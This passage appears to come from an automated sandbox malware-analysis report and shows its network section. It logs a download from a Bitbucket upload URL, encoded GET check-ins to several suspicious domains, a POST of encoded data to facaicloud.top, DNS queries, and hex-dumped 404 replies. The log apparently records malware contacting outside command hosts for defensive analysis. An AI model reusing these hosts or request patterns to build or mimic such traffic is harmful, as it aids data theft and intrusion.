elBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5HI%2BmoxQQqA%2FJoPRSnjgCdSSRSG6OGZM7%2Bk14Fj0UPjRL0yvo%2FNoM0PqoD64CRp88RIYyjGI8Iyik85Wg%3D%3D&Expires=1729661485 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
              Source: global trafficHTTP traffic detected: GET /f2m8/?fvM8Gh=q8u1m2y9j/W78LyjRjBmLFBPluC1hJa5ZcIT7WbQRmUkJn/aUKn129a9SdOjfVpEuogWIbFDr3wrvEdEbURHbL899LelzoXXcWM6JsFHtDa1nH+G65yTIIp51Lx0C7/dwS8TcymTUlcC&DfDx=AFrxfzcH-Ld HTTP/1.1Host: www.joshcharlesfitness.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
              Source: global trafficHTTP traffic detected: GET /dc1u/?fvM8Gh=fFgJrpU7aD7UkZlQpUegXiYX0mHuwd+xKsDAURMBiAqiBmSaSKvvh09Aihxa8ofx/ezcm777pnsov1VcpLBlwmC3Iqy+K+pafl2LF2kBMm3CKkFZyMytkoTfA5EUxo7rNsMcOhPX02Mw&DfDx=AFrxfzcH-Ld HTTP/1.1Host: www.facaicloud.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
              Source: global trafficHTTP traffic detected: GET /eth5/?DfDx=AFrxfzcH-Ld&fvM8Gh=rP5P45xZZ1/7FcUVVUJeza+IVqMoIQCjuRWKRMBKl26wwcm/v5roWtgm33BJF8xpb4kfp7QdHQmzbzTt1acSQ4mCbwyezktofLwADktY5A3eXEgsMSOExa06ByFNIL6LLeLE9sVmxY4B HTTP/1.1Host: www.98080753.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
              Source: global trafficHTTP traffic detected: GET /u071/?fvM8Gh=bBJc85dRrz6VYFP8GwFXoZFtfmuQO+iyQ8ywsDhPMj3PkpaAJncRlOwVGrcs7/oiPMEubiNmeHgqiRXMS1H3OK+Zq7VhNcw4P6d6BN/xAJTWHzjowpdO9JjlTFWXwfVVhN461s++G65d&DfDx=AFrxfzcH-Ld HTTP/1.1Host: www.wcp58.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
              Source: global trafficHTTP traffic detected: GET /muj9/?fvM8Gh=hgXo7easQgYwzYM50VVsBbrTpvYmtRva0zGF6x/wVx5xdFtAh4cdAJarj8a6/VZ0fLckawx66xls7kEuRRfHglkiUnpuSxGF6OqSwfVcl2N6vBJ8grdIeIpeinnOhUKuNcVRLIFrNYJr&DfDx=AFrxfzcH-Ld HTTP/1.1Host: www.cpamerix.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
              Source: global trafficHTTP traffic detected: GET /t67j/?fvM8Gh=KowgBu3DXf0G7hBLtaH8s8ZzKm+VG/tpKZ1Q7eDBR0ArwNxjdNGLI+rTTcfRvEyEYs27WEZYXeTRVuyNENDuSquLWx1vE6gNEX6tkQ0IxcS5dAyUTa1RZ/bXBmbIS1WdqDLnMr1sBa9m&DfDx=AFrxfzcH-Ld HTTP/1.1Host: www.lotus9.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: www.joshcharlesfitness.xyz
              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: www.facaicloud.top
              Source: global trafficDNS traffic detected: DNS query: www.98080753.xyz
              Source: global trafficDNS traffic detected: DNS query: www.wcp58.top
              Source: global trafficDNS traffic detected: DNS query: www.cpamerix.online
              Source: global trafficDNS traffic detected: DNS query: www.lotus9.life
              Source: global trafficDNS traffic detected: DNS query: www.g4s7e5.biz
              Source: unknownHTTP traffic detected: POST /dc1u/ HTTP/1.1Host: www.facaicloud.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.facaicloud.topContent-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.facaicloud.top/dc1u/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)Data Raw: 66 76 4d 38 47 68 3d 53 48 49 70 6f 65 59 2b 53 54 54 53 6b 35 68 33 6a 6a 33 69 52 58 74 6e 73 33 44 67 39 34 43 61 4d 66 4b 6a 55 56 64 62 74 41 6d 6b 48 79 58 42 57 65 2f 42 78 33 4e 4b 6b 52 4a 52 35 49 7a 2f 31 4d 7a 59 76 64 4c 43 74 46 77 39 74 6a 63 6c 6c 62 52 48 69 56 43 35 48 4c 44 61 51 70 45 43 42 57 53 6d 59 33 51 72 4a 7a 4b 43 4a 30 78 6d 38 74 4c 58 71 62 37 4c 44 4b 63 53 77 59 36 58 48 73 41 4e 4a 67 69 41 78 44 63 4a 62 76 48 57 76 76 6e 75 58 51 6e 38 65 37 41 65 41 41 38 49 2b 71 41 4b 79 4d 45 61 73 58 70 36 77 4a 70 42 35 33 49 4e 6b 2b 62 31 67 48 6a 34 6d 5a 57 58 6c 6c 6a 6c 68 43 78 51 4f 45 43 73 68 74 38 74 57 51 3d 3d Data Ascii: fvM8Gh=SHIpoeY+STTSk5h3jj3iRXtns3Dg94CaMfKjUVdbtAmkHyXBWe/Bx3NKkRJR5Iz/1MzYvdLCtFw9tjcllbRHiVC5HLDaQpECBWSmY3QrJzKCJ0xm8tLXqb7LDKcSwY6XHsANJgiAxDcJbvHWvvnuXQn8e7AeAA8I+qAKyMEasXp6wJpB53INk+b1gHj4mZWXlljlhCxQOECsht8tWQ==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:41 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a72cd5-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:44 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a72cd5-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 05:03:46 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a72cd5-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
